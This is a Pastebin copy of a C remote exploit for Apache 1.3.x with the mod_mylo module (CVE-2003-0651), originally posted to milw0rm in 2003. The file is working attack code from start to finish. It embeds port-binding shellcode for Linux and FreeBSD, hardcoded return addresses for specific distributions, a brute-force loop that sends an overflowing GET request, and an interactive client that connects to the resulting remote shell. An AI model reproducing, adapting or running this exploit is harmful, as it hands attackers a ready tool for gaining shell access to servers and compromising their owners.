Advertisement
FlyFar

Apache 1.3.x mod_mylo - Remote Code Execution - CVE-2003-0651

Feb 6th, 2024
843
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 11.63 KB | Cybersecurity | 0 0
  1. /*
  2.   Apache + mod_mylo remote exploit
  3.   By Carl Livitt / July 2003
  4.   carllivitt at hush dot com
  5.  
  6.   Public release - Linux and FreeBSD targets.
  7. */
  8. #include <sys/types.h>
  9. #include <sys/stat.h>
  10. #include <sys/socket.h>
  11. #include <net/if.h>
  12. #include <netinet/in.h>
  13. #include <netinet/tcp.h>
  14. #include <arpa/inet.h>
  15. #include <stdio.h>
  16. #include <string.h>
  17. #include <unistd.h>
  18. #include <signal.h>
  19. #include <netdb.h>
  20. #include <time.h>
  21. #include <stdarg.h>
  22.  
  23. #define SIZ 8096
  24. #define HTTP_PORT 80
  25. #define SHELL_PORT 45295
  26. #define SOCKET_ERR -2
  27. #define CONNECT_ERR -3
  28. #define HOST_NOT_RESOLVED -4
  29. #define BRUTE_FORCE_EXHAUSTED -5
  30. #define SHELL_NOT_FOUND -7
  31. #define SUCCESS 1
  32. #define FAILED 0
  33.  
  34. // The following shellcode had 0x3f (?) chars in it which
  35. // cause termination of our HTTP GET before the whole
  36. // shellcode is written to the stack. The 0x3f's are
  37. // needed because they are the dup2() syscall numbers. So,
  38. // I've changed them to 0x3e's and INC'd them before doing
  39. // an INT 0x80. Other than that, this shellcode is eSDee's.
  40. // --------
  41. // linux x86 shellcode by eSDee of Netric (www.netric.org)
  42. // 200 byte - forking portbind shellcode - port=0xb0ef(45295)
  43. char linux_shellcode[]=
  44.         "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
  45.         "\x06\x51\xb1\x01\x51\xb1\x02\x51"
  46.         "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
  47.         "\x89\xc1\x31\xc0\x31\xdb\x50\x50"
  48.         "\x50\x66\x68\xb0\xef\xb3\x02\x66"
  49.         "\x53\x89\xe2\xb3\x10\x53\xb3\x02"
  50.         "\x52\x51\x89\xca\x89\xe1\xb0\x66"
  51.         "\xcd\x80\x31\xdb\x39\xc3\x74\x05"
  52.         "\x31\xc0\x40\xcd\x80\x31\xc0\x50"
  53.         "\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
  54.         "\x80\x89\xd7\x31\xc0\x31\xdb\x31"
  55.         "\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
  56.         "\x80\x31\xc0\x31\xdb\x50\x50\x57"
  57.         "\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
  58.         "\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
  59.         "\xcd\x80\x39\xc3\x75\x40\x31\xc0"
  60.         "\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
  61.         "\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
  62.         "\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
  63.         "\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
  64.         "\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  65.         "\x62\x69\x6e\x89\xe3\x8b\x54\x24"
  66.         "\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
  67.         "\x80\x31\xc0\x40\xcd\x80\x31\xc0"
  68.         "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
  69.  
  70. // This shellcode is unchanged (why reinvent the wheel ?):
  71. // --------
  72. /* BSD x86 shellcode by eSDee of Netric (www.netric.org)
  73.  * 194 byte - forking portbind shellcode - port=0xb0ef(45295)
  74.  */
  75. char freebsd_shellcode[]=
  76.         "\x31\xc0\x31\xdb\x53\xb3\x06\x53"
  77.         "\xb3\x01\x53\xb3\x02\x53\x54\xb0"
  78.         "\x61\xcd\x80\x89\xc7\x31\xc0\x50"
  79.         "\x50\x50\x66\x68\xb0\xef\xb7\x02"
  80.         "\x66\x53\x89\xe1\x31\xdb\xb3\x10"
  81.         "\x53\x51\x57\x50\xb0\x68\xcd\x80"
  82.         "\x31\xdb\x39\xc3\x74\x06\x31\xc0"
  83.         "\xb0\x01\xcd\x80\x31\xc0\x50\x57"
  84.         "\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
  85.         "\xdb\x50\x89\xe1\xb3\x01\x53\x89"
  86.         "\xe2\x50\x51\x52\xb3\x14\x53\x50"
  87.         "\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
  88.         "\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
  89.         "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
  90.         "\x39\xc3\x75\x44\x31\xc0\x57\x50"
  91.         "\xb0\x06\xcd\x80\x31\xc0\x50\x56"
  92.         "\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
  93.         "\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
  94.         "\x80\x31\xc0\x43\x53\x56\x50\xb0"
  95.         "\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
  96.         "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
  97.         "\x89\xe3\x50\x54\x53\x50\xb0\x3b"
  98.         "\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
  99.         "\x31\xc0\x56\x50\xb0\x06\xcd\x80"
  100.         "\xeb\x9a";
  101.  
  102. struct {
  103.         char *platform;
  104.         unsigned long bruteStart, bruteEnd;
  105.         unsigned long retAddr;
  106.         int offset, len;
  107.         char *shellcodePtr;
  108. } targets[]= {
  109.         { "SuSE 8.1, Apache 1.3.27 (installed from source) (default)", 0x08117c04,
  110. 0x08117dff, 0xbfffe9f0, 500, 4104, linux_shellcode },
  111.         { "RedHat 7.2, Apache 1.3.20 (installed from RPM)", 0x08105104, 0x081051ff,
  112. 0xbfffe0b0, 1000, 4104, linux_shellcode },
  113.         { "RedHat 7.3, Apache 1.3.23 (installed from RPM)", 0x080ef304, 0x080ef3ff,
  114. 0xbfffe190, 750, 4104, linux_shellcode },
  115.         { "FreeBSD 4.8, Apache 1.3.27 (from Ports)", 0x080bf004, 0x080bf0ff, 0xbfbfea50
  116. ,3500, 4096, freebsd_shellcode },
  117.         NULL
  118. };
  119.  
  120. char usage[]=
  121. "Apache + mod_mylo remote exploit\n"
  122. "By Carl Livitt (carllivitt at hush dot com)\n\n"
  123. "Arguments: \n"
  124. "  -t target       Attack 'target' host\n"
  125. "  -T platform     Use parameters for target 'platform'\n"
  126. "  -h              This help.\n";
  127.  
  128. void my_send(int, char *, ...);
  129. void my_recv(int);
  130. void make_exploitbuf(char *);
  131. int connect_to_host(int);
  132. int attempt_exploit(void);
  133. void my_sleep(int n);
  134.  
  135. unsigned long retAddr=0,magic_r=0,MAGIC_R_START,MAGIC_R_END, exactPointerAddy=0;
  136. char buf[SIZ], host[SIZ]="";
  137. int useTarget=0;
  138. struct hostent *hostStruct;
  139.  
  140. main(int argc, char **argv) {
  141.         int ch, i;
  142.  
  143.         while((ch=getopt(argc, argv, "t:T:e:hr:"))!=-1) {
  144.                 switch(ch) {
  145.                         case 't':
  146.                                 strncpy(host, optarg, SIZ-1);
  147.                                 break;
  148.                         case 'T':
  149.                                 useTarget=atoi(optarg);
  150.                                 break;
  151.                         case 'e':
  152.                                 exactPointerAddy=strtoul(optarg,NULL,16);
  153.                                 break;
  154.                         case 'r':
  155.                                 retAddr=strtoul(optarg,NULL,16);
  156.                                 break;
  157.                         case 'h':
  158.                         default:
  159.                                 printf("%s\n",usage);
  160.                                 printf("Available platforms:\n");
  161.                                 for(i=0;targets[i].platform;i++)
  162.                                         printf("%2d. %s\n", i, targets[i].platform);
  163.                                 printf("\n");
  164.                                 exit(0);
  165.                                 break; // it's good practice :)
  166.                 }
  167.         }
  168.  
  169.         // Sanity check
  170.         if(!retAddr && exactPointerAddy) {
  171.                 printf("[*] You must give RET address when specifying a pointer address\n");
  172.                 printf("    A good place to start is 0xbfffe0b0(linux) or 0xbfbfe0b0(freeBSD)\n");
  173.         printf("    Also remember to pass a -T x flag... things will be unpredictable\n");
  174.         printf("    if you don't!\n");
  175.                 exit(0);
  176.         }
  177.  
  178.         if((hostStruct=gethostbyname(host))==NULL) {
  179.                printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
  180.                 exit(0);
  181.         }
  182.  
  183.         switch(attempt_exploit()) {
  184.                 case HOST_NOT_RESOLVED:
  185.                         printf("[*] Couldn't connect to host: %s not found.\n", host);
  186.                         break;
  187.                 case SOCKET_ERR:
  188.                         printf("[*] Couldn't grab a socket!\n");
  189.                         break;
  190.                 case CONNECT_ERR:
  191.                         printf("[*] Connection to %s was rejected\n",host);
  192.                         break;
  193.                 case SHELL_NOT_FOUND:
  194.                         printf("[*] This attempt failed ...\n");
  195.                         break;
  196.                 case BRUTE_FORCE_EXHAUSTED:
  197.                         printf("[*] Bruteforce failed.\n");
  198.                         break;
  199.                 case SUCCESS:
  200.                         break;
  201.                 default:
  202.                         printf("[*] ERROR: There was no error!\n");
  203.                         break;
  204.         }
  205.  
  206.         printf("\nHave a nice day!\n");
  207.         exit(0);
  208. }
  209.  
  210. int attempt_exploit(void) {
  211.     fd_set rfds;
  212.     int sock,retVal,r;
  213.  
  214.     if(exactPointerAddy) {
  215.         printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
  216.         if((sock=connect_to_host(HTTP_PORT))<=0)
  217.             return sock;
  218.         magic_r=exactPointerAddy;
  219.         make_exploitbuf(buf);
  220.         my_send(sock, buf);
  221.         my_recv(sock);
  222.         close(sock);
  223.         my_sleep(100000);
  224.                 if((sock=connect_to_host(SHELL_PORT))<=0) {
  225.             return sock;
  226.         }
  227.     } else { // Do crappy bruteforce loop
  228.         printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
  229.         MAGIC_R_START=targets[useTarget].bruteStart;
  230.         MAGIC_R_END=targets[useTarget].bruteEnd;
  231.         retAddr=targets[useTarget].retAddr;
  232.         for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) {
  233.             printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
  234.             if((sock=connect_to_host(HTTP_PORT))<=0)
  235.                 return sock;
  236.             make_exploitbuf(buf);
  237.             my_send(sock, buf);
  238.             my_recv(sock);
  239.             close(sock);
  240.             my_sleep(50000);
  241.             if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) {
  242.                 printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
  243.                 break;
  244.             }
  245.         }
  246.         if(magic_r>MAGIC_R_END)
  247.             return BRUTE_FORCE_EXHAUSTED;
  248.     }
  249.  
  250.         printf("[-] Connected to %s! You can type commands now:\n", host);
  251.  
  252.         // Now let the attacker issue commands to the remote
  253.         // shell, just as if (s)he had launched 'nc host 45295'.
  254.         do {
  255.                 FD_ZERO(&rfds);
  256.                 FD_SET(0, &rfds);
  257.                 FD_SET(sock, &rfds);
  258.                 retVal=select(sock+1, &rfds, NULL, NULL, NULL);
  259.                 if(retVal) {
  260.                         if(FD_ISSET(sock, &rfds)) {
  261.                                 buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
  262.                                 printf("%s", buf);
  263.                         }
  264.                         if(FD_ISSET(0, &rfds)) {
  265.                                 buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
  266.                                 send(sock, buf, strlen(buf), 0);
  267.                         }
  268.  
  269.                 }
  270.         } while(retVal && r); // loop until connection terminates
  271.  
  272.         close(sock);
  273.         return SUCCESS;
  274. }
  275.  
  276. // Given a port number, connects to an already resolved hostname...
  277. // connects a TCP stream and returns a socket number (or returns error)
  278. int connect_to_host(int p) {
  279.         int sock;
  280.         struct sockaddr_in saddr;
  281.  
  282.         if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  283.                 return SOCKET_ERR;
  284.         memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
  285.         saddr.sin_family=AF_INET;
  286.         saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
  287.         saddr.sin_port=htons(p);
  288.         if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
  289.                 close(sock);
  290.                 return CONNECT_ERR;
  291.         } else
  292.                 return sock;
  293. }
  294.  
  295. void make_exploitbuf(char *b) {
  296.         unsigned long *ptr;
  297.         char *sc=(char *)&targets[useTarget].shellcodePtr[0];
  298.  
  299.         memset(b,0x00,SIZ-1);
  300.         strcat(b,"GET ");
  301.         memset(b+4,0x90,targets[useTarget].len);
  302.         memcpy((b+targets[useTarget].len)-(strlen(sc)+targets[useTarget].offset)-9,sc,strlen(sc));
  303.         ptr=(unsigned long *)&b[strlen(b)];
  304.         *(ptr++)=retAddr;
  305.         *ptr=magic_r;
  306.         strcat(b, "\n\n");
  307. }
  308.  
  309. // Handy little function to send formattable data down a socket.
  310. void my_send(int s, char *b, ...) {
  311.         va_list ap;
  312.         char *buf;
  313.  
  314.         va_start(ap,b);
  315.         vasprintf(&buf,b,ap);
  316.         send(s,buf,strlen(buf),0);
  317.         va_end(ap);
  318.         free(buf);
  319. }
  320.  
  321. // Another handy function to read data from a socket.
  322. void my_recv(int s) {
  323.         int len;
  324.         char buf[SIZ];
  325.  
  326.         len=recv(s, buf, SIZ-1, 0);
  327.         buf[len]=0;
  328. }
  329.  
  330. // Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
  331. void my_sleep(int n) {
  332.         struct timespec t;
  333.         t.tv_sec=0;
  334.         t.tv_nsec=n;
  335.         nanosleep(&t,&t);
  336. }
  337.  
  338. // milw0rm.com [2003-07-28]
  339.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement